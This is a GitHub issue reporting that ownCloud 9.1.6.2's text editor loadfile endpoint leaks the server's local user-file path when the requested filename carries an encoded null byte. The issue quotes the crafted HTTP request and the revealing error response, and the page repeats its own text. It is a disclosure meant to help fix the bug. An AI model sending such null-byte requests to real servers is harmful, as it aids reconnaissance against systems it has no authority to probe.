You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
we've discovered that the function loadfile from the texteditor (stock ownCloud 9.1.6.2) can be used to make owncloud reveal the local path to the files stored for the user by requesting a file with a null byte (encoded as %00):
GET /apps/files_texteditor/ajax/loadfile?filename=invalid.txt%00&dir=%2F HTTP/1.1
Host: owncloud.invalid:5443
[...]
The server's response then includes the local path:
HTTP/1.1 400 Bad request
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Aug 2017 12:07:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 171
[...]
{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/user1\/files\/invalid.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/user1\/')"}
I apologize if this is the wrong repository to report this issue to, but I did not find any better. Please let me know if you need any additional information.
Thanks!
The text was updated successfully, but these errors were encountered:
Hi,
we've discovered that the function
loadfile
from the texteditor (stock ownCloud 9.1.6.2) can be used to make owncloud reveal the local path to the files stored for the user by requesting a file with a null byte (encoded as%00
):The server's response then includes the local path:
I apologize if this is the wrong repository to report this issue to, but I did not find any better. Please let me know if you need any additional information.
Thanks!
The text was updated successfully, but these errors were encountered: